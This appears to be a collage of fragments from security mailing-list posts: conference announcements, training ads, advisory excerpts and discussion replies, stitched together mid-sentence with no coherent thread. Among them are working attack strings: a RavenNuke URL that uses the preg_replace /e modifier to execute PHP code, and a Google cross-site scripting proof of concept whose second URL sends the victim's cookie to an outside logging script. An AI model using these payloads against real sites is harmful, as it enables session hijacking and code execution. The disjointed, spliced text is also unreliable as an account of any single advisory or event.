More information about the workshop can be found at:
http://iseclab.org/badgers2011/
The BADGERS workshop is intended to encourage the development of large
scale security-related data collection and analysis initiatives. It
will provide an environment to describe already existing real-world,
large-scale datasets, and to share with the systems community the
return on experiences acquired by analyzing such collected
data. Furthermore, novel approaches to collect and study such data
sets are welcome.
>
> No disrespect taken - we're all just people here ;)
>
> Thing is, in a "perfect world" we wouldn't need security at all (well,
> depending on your definition of "perfect world" is of course) - it's
> "real world" issues that require we build multiple layers of defenses to
> ensure that assets are protected when other layers, mechanisms, or
> policies fail. And not being able to predict the future is *precisely*
> why security in depth is required. For example-- Back in January of
> 2003 (where has the time gone?) I published an article on Security Focus
> discussing how to secure Exchange Server deployments.
Building/Hacking Open Source Embedded Wireless Routers
Instructor: Ken Caruso & Matt Westervelt
Availability: 9 seats left
This workshop is set up to teach people how to deploy real-world, large
scale wireless networks using open source hardware and software.
People attending this class will receive a free Soekris access point
setup and will get all of the software pre-packaged to readily boot it
up and run any of the standard mesh-networking protocols. This
workshop is run by the guys that run the Seattle Wireless community
easy means of exploiting this VMware emulation flaw.
Unlike the first flaw, this flaw is not affected by VMware's "Disable
acceleration" option, and does not require repetition due to a timing
dependency. More important, however, is that this flaw can be
reproduced easily and accidentally, during real-world usage, by
attempting to single-step an "INT 3" instruction in a debugger. It is
likely that other software developers, and possibly security
researchers, have experienced unintended manifestations of this flaw.
I would like to inform that the next edition's agenda is now available
at: http://2010.confidence.org.pl/agenda.
Among the many distinguished speakers, you can find:
########## SPEAKERS ##########
# Jacob Appelbaum - "Anonymity, Privacy, and Circumvention with Tor in the Real World
# Ulascan Aytlolun, Celil ‘karak0rsan’ Ünüver - "Analysis of Software Vulnerabilities"
# Axelle Apvrille - "The Four Horsemen – Malware for mobile"
# Frank Breedijk - "PKI is dead, long live PKI"
# Jesse Burns - "Aurora attacks" and "Android Reverse Engineering"
# Gynvael Coldwind - "Case study of recent Windows vulnerabilities"
1. attacker must be logged in as user
Comments:
1. Exploit is using "preg_replace" e-modifier
2. "register_globals" setting does not matter
3. Sentinel will not stop this exploit
4. POST method will leave clean logs in most real-world cases
Test using GET method:
http://localhost/ravennuke230/modules.php?name=Your_Account&op=avatarlist
&avatarcategory=gallery&patterns[6]=/a/e&replacements[6]=phpinfo()
Simple Proof of Concept Code that displays your Google.com cookie in an alert box:-
http://google.com/support/webmasters/bin/answer.py?answer=34575&cbid=-1oudgq5c3804g';alert(document.cookie);//&src=cb&lev=index
More real-world example where an attacker will silently transfer your Google.com cookie to his or her evil site:-
http://google.com/support/webmasters/bin/answer.py?answer=34575&cbid=-1oudgq5c3804g';ifr=document.createElement('iframe');ifr.src='http:'+'//www.securethoughts.com/security/cookielogger/log.cgi?cookie='+escape(document.cookie);document.body.appendChild(ifr);//src=cb&lev=index
I would like to thank the Google Security Team for their prompt responses and fixing this serious issue in a timely manner. If you think Google took a long time in fixing this vulnerability, think again. This python script is used in a lot of places. Try this Google Dork to see the usage of this script in almost all Google Services.
Attacking Hardware
* Hardware reverse engineering (and exploitation + backdooring)
* Femto-cell hacking (3G, LTE, ...)
* Microchip grinding, opening, imaging and reverse engineering
* BIOS and otherwise low-level exploitation vectors
* Real-world SMM usage! We know it's vulnerable, now let's do something
* WiFi drivers and System on Chip (SoC) overflow, exploitation and
backdooring.
* Gnu Radio hacking applied to new domains
* Toll-booth and fast-lane payment systems
char *psBuf;
char *psTmp;
char *psTmp2;

cbLen = strlen(szUrl);
cbLen++; // room for the terminating NUL; wrap possible, not exploitable in real world
psBuf = malloc(cbLen);
if(psBuf == NULL)
{
    return 0;
}
VUPEN WASS is based on a proprietary technology developed by VUPEN security
experts, and combines black-box (smart and automated) and grey-box
(signature-based) scanning to accurately identify web vulnerabilities such
as those in the OWASP Top 10, including SQL injection and cross-site
scripting, but also real-world vulnerabilities such as shell command
injection and file inclusion.
Read More: http://www.vupen.com/english/wass/
Any input from a user is susceptible to tampering. The advisory is specifically about vulnerabilities in how frameworks handle view states. While the frameworks provide functions to secure the view states, the specific vulnerabilities are not documented by the vendors.
Apache's documentation states that the encryption is only needed when t:SaveState tag is used. Sun provides no specific recommendations on encrypting the view state. Microsoft recommends securing the view state, but doesn't provide concise information about what will happen if you don't.
The purpose of our advisory was to show that unsecured view states will always be vulnerable to real-world attacks. This changes view state security from a best-practice to a demonstrable vulnerability for all applications developed on the three frameworks described.
Regarding your specific questions:
1) Yes, we did find specific vulnerabilities in all three products listed. The Microsoft vulnerability is demonstrated in the advisory. The Apache MyFaces vulnerability is described in the advisory, but a specific attack is beyond the scope of the advisory. Trustwave has released Deface (https://www.trustwave.com/spiderLabs-tools.php) to demonstrate an actual attack. The Sun Mojarra vulnerability is essentially the same as the one in Apache MyFaces, but is not supported by Deface. If you are familiar with Java, Deface can be modified for use with Mojarra.
Removing the Uncertainty and Doubt (but not the Fear) from Information
Risk Management
Billy Rios and Jeff Carr, Microsoft
Sun Tzu was a Hacker - An Examination of the Tactics and Operations
from a Real World Cyber Attack
Olivier Thonnard, Royal Military Academy, Belgium
Behavioral Analysis of Zombie Armies
Lt Col Forrest Hare, OSD, George Mason School of Public Policy
Instructors: Gabriel Lawrence, James O'Gorman, Matthew Churchill, & datagram
Includes: USB Flash Drive, Lockpicks, Materials
This course will cover all of the behind-the-scenes things that you need to know to be an effective security administrator and/or CSO. The first day of this course will focus on the different threats and attack vectors facing your company, covering both network- and physical-based attacks, ways to identify how attackers could get into your network, and the countermeasures that you can take to prevent it from happening.
On the second day, we will address the scenario where someone does get into your network and go in-depth on how to perform proper incident response, what happens behind the scenes in the whole forensics process, including real-world training from ex-law enforcement, and the do's and don'ts of handling data on compromised machines.
[*] SEMINARS
Pre-Registration: $750
Submissions:
------------
RAID 2009 invites two types of submissions:
1. Full papers presenting mature research results or summarizing
operational experience protecting or monitoring large real-world
networks. Papers can be 10-20 pages long and, if accepted, they will
be presented and included in the RAID 2009 proceedings published by
Springer Verlag in its Lecture Notes in Computer Science
(http://www.springer.de/comp/lncs/index.html) series. Papers must be
formatted according to the instructions provided by Springer Verlag
figures in the international security industry will get together and
share best practices and technology. The conference will be held at the
University of Applied Sciences in Rapperswil lakeside of Lake Zurich on
May 12-15 2011. Significant discoveries about cyber underground,
advanced persistent threat including computer network hack attacks and
defenses, and pragmatic real world security experience will be presented
in a series of well chosen talks. Swiss Cyber Storm provides European
and international researchers a relaxed, comfortable environment to
learn from key developments in security technology, and collaborate and
socialize with their peers in one of Switzerland's most visited towns
with an exceptionally wonderful view to the snowy Alps.
> dead end. ...
...depending on your definition of "dead".
Clearly yours is based on something so far out of touch with the real
world of "typical users" that it really was not worth the effort you
expended writing about it.
Or did you mean "helping organized crime make its next few millions"?
> ... Not even a very effective drive by.
To verify this vulnerability with a real-world example, we have
investigated the Sun Java System Webserver WebDAV remote buffer overflow
vulnerability disclosed in January 2010 [7]. The bug was proved
exploitable reliably [8] on DEP enabled systems running as Guest OS on
Virtual PC.
Apocalypse Survivor Normalboy, Laughing Man, Jerome Athias, Roland and
Waldorf Music Gear, and to all the Giraffes In Wheelchairs.
Think you have what it takes to be an eEye Engineer?
eEye Digital Security is always looking for good engineers to add to its
R&D team. If you have a passion for real-world security research and the
drive to create enterprise class solutions, check out our open
positions: http://www.eeye.com/html/company/careers/index.html.
However, if you prefer to break software rather than make it, Research
is always taking resumes at skunkworks@eeye.com.
M. Burnett brings up an important point - there is a lot of
VM-as-panacea promotion going on, and implementers need to put some more
thought into how VMs really fit in to the least privilege model.
Another real-world scenario where this is directly relevant is for
teleworkers.
Some companies provide VMs to remote users thinking that they provide a
secure way for people to connect to a the trusted network from an
untrusted computer. They try to use the VM as virtual security when they
Deploying mission-critical computer systems at locations where they can only be managed remotely is increasingly becoming a necessary requirement of real-world systems design. Thus there is a practical demand for the so-called "self-aware autonomous trusted" systems capable of
- monitoring their own state in order to distinguish "good" states
from inconsistent ones,
- automatically "fixing themselves", i.e., restoring their state to
a known good one when it becomes "bad" (exploited) or
inconsistent, and
> Although this fix prevented the unlimited overflow of the
> buffer, it still allowed an off-by-one buffer overflow to
> happen, which could potentially still result in remote code
> execution.
Both these bugs of course exist, and have been fixed. However, it is unclear if they could actually be exploited in the real world.
In fact, in order to exploit that function you need:
1) an application which explicitly calls it (i.e. it's not used, as far
as I can tell, in the regular handshake)
2) you should pass the ciphers with the malformed names to BOTH client and server (always as far as I can tell), because cipher setting handshake occurs and it doesn't call the function, so if I'm correct on this, this means:
1992, RFC 1341. The current standard is specified in RFC 2045 from 1996.
MIME is a recursive data format. MIME objects consist of a header and a
body, where the content-type field of the header specifies the type of the
body. The body can consist of several separated MIME-objects, a single
MIME-object, a block of text, an encoded image or about anything specified
in the header. It is possible to read some real-world examples by opening
some emails and hitting "show source".
== Two examples to illustrate MIME ==
The first example is the content-type:message/rfc822, which is intended for
forwarding emails. The following body is a complete email, which starts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Preconditions:
===============
a) ImageMagick must be set as picture processing method.
The default Coppermine setting is GD, so many real-world Coppermine
installations are probably not affected by this security issue.
Impact
===============
An attacker is able to execute arbitrary shell commands with the privileges
• Mikko Hypponen, CRO, F-Secure: Evolution of the Cyber Threat
• Jose Nazario, Arbor Networks: Measuring Global Denial of Service Attacks
• Amit Yoran, CEO, NetWitness: Information Risk Management: Removing the Uncertainty
• Felix Leder and Tillmann Werner: Proactive Botnet Countermeasures: An Offensive Approach
• Andrew Cutts, Director, Cybersecurity Policy (DHS): Cyber Risk from a Homeland Security Perspective
• Billy Rios and Jeff Carr, Microsoft: Examination of a Real World Cyber Attack
• Dr Rex B. Hughes, Cambridge-MIT Institute: Towards a Global Regime for Cyber Defense
• Dr. Stuart H. Starr, NDU: Towards a (Preliminary) Theory of Cyberpower
• Roelof Temmingh, CEO, Paterva: Evaluating the Credibility of a Cyber Threat
• Scott Borg, Director, U.S. Cyber Consequences Unit: The Cyber-Defence Revolution
There are some mitigating factors though:
1. IIS webserver can refuse ".mdb" file download
2. database file or directory can be renamed to something else
A quick look at real-world sites shows that ~20% of them are exploitable.
Considering the large number of DBlog-based websites, this is a serious problem IMHO.
How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~